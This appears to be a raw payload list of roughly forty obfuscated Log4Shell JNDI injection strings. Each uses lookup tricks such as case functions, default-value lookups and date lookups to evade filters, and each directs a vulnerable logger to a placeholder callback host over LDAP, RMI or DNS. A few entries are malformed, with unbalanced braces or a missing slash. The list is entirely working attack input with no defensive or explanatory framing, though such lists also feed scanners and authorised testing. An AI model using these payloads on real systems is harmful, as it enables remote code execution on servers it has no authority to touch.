${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://CALLBACK_DOMAIN/poc}
${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://CALLBACK_DOMAIN/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://CALLBACK_DOMAIN/poc}
${${::-j}ndi:rmi://CALLBACK_DOMAIN/poc}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://CALLBACK_DOMAIN/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//CALLBACK_DOMAIN/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://CALLBACK_DOMAIN/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//CALLBACK_DOMAIN/poc}
${${lower:${lower:jndi}}:${lower:rmi}://CALLBACK_DOMAIN/poc}
${${lower:jndi}:${lower:rmi}://CALLBACK_DOMAIN/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://CALLBACK_DOMAIN/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN/poc}
${${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/poc}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://CALLBACK_DOMAIN/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://CALLBACK_DOMAIN/poc}
${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}CALLBACK_DOMAIN/poc}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://CALLBACK_DOMAIN/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//CALLBACK_DOMAIN/poc
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://CALLBACK_DOMAIN/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//CALLBACK_DOMAIN/poc}
${j${k8s:k5:-ND}i:ldap://CALLBACK_DOMAIN/poc}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://CALLBACK_DOMAIN/poc}
${jnd${sys:UNIX:-i}:ldap:/CALLBACK_DOMAIN/poc}
${jnd${upper:i}:ldap://CALLBACK_DOMAIN/poc}                       
${jnd${upper:ı}:ldap://CALLBACK_DOMAIN/poc}
${jndi${123%25ff:-}:ldap://CALLBACK_DOMAIN/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN}
${jndi:dns://CALLBACK_DOMAIN/poc}
${jndi:dns://CALLBACK_DOMAIN}
${jndi:ldap://127.0.0.1#CALLBACK_DOMAIN/poc}
${jndi:ldap://127.0.0.1#CALLBACK_DOMAIN:1389/poc}
${jndi:ldap://127.0.0.1#{\{CALLBACK_DOMAIN}}/{poc}}
${jndi:ldap://127.1.1.1#CALLBACK_DOMAIN/poc}
${jndi:ldap://CALLBACK_DOMAIN/poc}
${jndi:rmi://CALLBACK_DOMAIN/poc}
${jndi:rmi://CALLBACK_DOMAIN}
${jndi:rmi://CALLBACK_DOMAIN}/
